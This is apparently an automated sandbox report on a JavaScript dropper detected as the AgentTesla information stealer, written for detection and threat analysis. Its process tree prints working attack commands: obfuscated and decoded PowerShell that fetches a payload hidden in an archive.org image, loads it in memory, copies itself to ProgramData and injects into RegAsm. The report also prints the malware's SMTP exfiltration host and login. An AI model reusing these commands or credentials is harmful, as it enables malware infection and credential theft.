Edit tour

Windows Analysis Report
INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js

Overview

General Information

Sample name:	INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js
Analysis ID:	1501719
MD5:	e4b82b3738d246e3734ac96ac87dc0e8
SHA1:	34e616d4a1ddeb444b43af44ef5a89fe40200c51
SHA256:	c95e9d8f6e53233a7c10c496b19a66858c52c013d426f3d566ae978071a4dce6
Tags:	js
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

JScript performs obfuscated calls to suspicious functions

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell download and load assembly

Sigma detected: RegAsm connects to smtp port

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Powershell download and execute

Bypasses PowerShell execution policy

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates autostart registry keys with suspicious values (likely registry only malware)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7472 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 7564 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBF? ? ? ? ?E4? ? ? ? ?R? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D? ? ? ? ?? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cs? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?LgBM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?t? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBT? ? ? ? ?HU? ? ? ? ?YgBz? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?QwBv? ? ? ? ?G4? ? ? ? ?dgBl? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?Bd? ? ? ? ?Do? ? ? ? ?OgBG? ? ? ? ?HI? ? ? ? ?bwBt? ? ? ? ?EI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BD? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?UgBl? ? ? ? ?GY? ? ? ? ?b? ? ? ? ?Bl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bp? ? ? ? ?G8? ? ? ? ?bg? ? ? ? ?u? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQBd? ? ? ? ?Do? ? ? ? ?OgBM? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bj? ? ? ? ?G8? ? ? ? ?bQBt? ? ? ? ?GE? ? ? ? ?bgBk? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?V? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bu? ? ? ? ?Gw? ? ? ? ?aQBi? ? ? ? ?C4? ? ? ? ?SQBP? ? ? ? ?C4? ? ? ? ?S? ? ? ? ?Bv? ? ? ? ?G0? ? ? ? ?ZQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?G0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?E0? ? ? ? ?ZQB0? ? ? ? ?Gg? ? ? ? ?bwBk? ? ? ? ?Cg? ? ? ? ?JwBW? ? ? ? ?EE? ? ? ? ?SQ? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?dgBv? ? ? ? ?Gs? ? ? ? ?ZQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?bgB1? ? ? ? ?Gw? ? ? ? ?b? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBv? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?Bb? ? ? ? ?F0? ? ? ? ?XQ? ? ? ? ?g? ? ? ? ?Cg? ? ? ? ?JwB0? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?RwBS? ? ? ? ?E8? ? ? ? ?LwBn? ? ? ? ?G8? ? ? ? ?b? ? ? ? ?? ? ? ? ?v? ? ? ? ?G0? ? ? ? ?bwBj? ? ? ? ?C4? ? ? ? ?bwBu? ? ? ? ?GE? ? ? ? ?c? ? ? ? ?Bu? ? ? ? ?GE? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C8? ? ? ? ?Lw? ? ? ? ?6? ? ? ? ?HM? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?MQ? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Qw? ? ? ? ?6? ? ? ? ?Fw? ? ? ? ?U? ? ? ? ?By? ? ? ? ?G8? ? ? ? ?ZwBy? ? ? ? ?GE? ? ? ? ?bQBE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Fw? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?By? ? ? ? ?G8? ? ? ? ?c? ? ? ? ?Bo? ? ? ? ?Gk? ? ? ? ?YQBu? ? ? ? ?HQ? ? ? ? ?ZQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'atrophiante','RegAsm','desativado'))" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7856 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\atrophiante.js" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7944 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2699963900.0000000002C4E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2699963900.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1545150331.000001A8E9449000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2697144825.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.2699963900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2699963900.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powershell.exe PID: 7564	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7564	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x124509:$b2: ::FromBase64String( 0x1258f5:$b2: ::FromBase64String( 0x125d56:$b2: ::FromBase64String( 0x1262d9:$b2: ::FromBase64String( 0x1266f3:$b2: ::FromBase64String( 0x12a4e8:$b2: ::FromBase64String( 0x12437d:$b3: ::UTF8.GetString( 0x125769:$b3: ::UTF8.GetString( 0x125bca:$b3: ::UTF8.GetString( 0x12614d:$b3: ::UTF8.GetString( 0x126567:$b3: ::UTF8.GetString( 0xc2dc4:$s1: -join 0xccf2f:$s1: -join 0x48ce9:$s3: reverse 0x48fd7:$s3: reverse 0x496f1:$s3: reverse 0x49eaa:$s3: reverse 0x51062:$s3: reverse 0x5147c:$s3: reverse 0x52004:$s3: reverse 0x52cb1:$s3: reverse
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: powershell.exe PID: 7728	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: powershell.exe PID: 7728	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x9bb51:$b2: ::FromBase64String( 0x9bef1:$b2: ::FromBase64String( 0x9cbce:$b2: ::FromBase64String( 0x10fa46:$b2: ::FromBase64String( 0x1165b3:$b2: ::FromBase64String( 0x1169c8:$b2: ::FromBase64String( 0x117c44:$b2: ::FromBase64String( 0x1349c2:$b2: ::FromBase64String( 0x13cca6:$b2: ::FromBase64String( 0x148822:$b2: ::FromBase64String( 0x148c31:$b2: ::FromBase64String( 0x1bfb57:$b2: ::FromBase64String( 0x222e78:$b2: ::FromBase64String( 0x223462:$b2: ::FromBase64String( 0x7a2e07:$b2: ::FromBase64String( 0x7a321d:$b2: ::FromBase64String( 0x7a383c:$b2: ::FromBase64String( 0x7a3e0d:$b2: ::FromBase64String( 0x7c8656:$b2: ::FromBase64String( 0x7c8a65:$b2: ::FromBase64String( 0x805595:$b2: ::FromBase64String(
Process Memory Space: RegAsm.exe PID: 7944	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7944	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.RegAsm.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegAsm.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
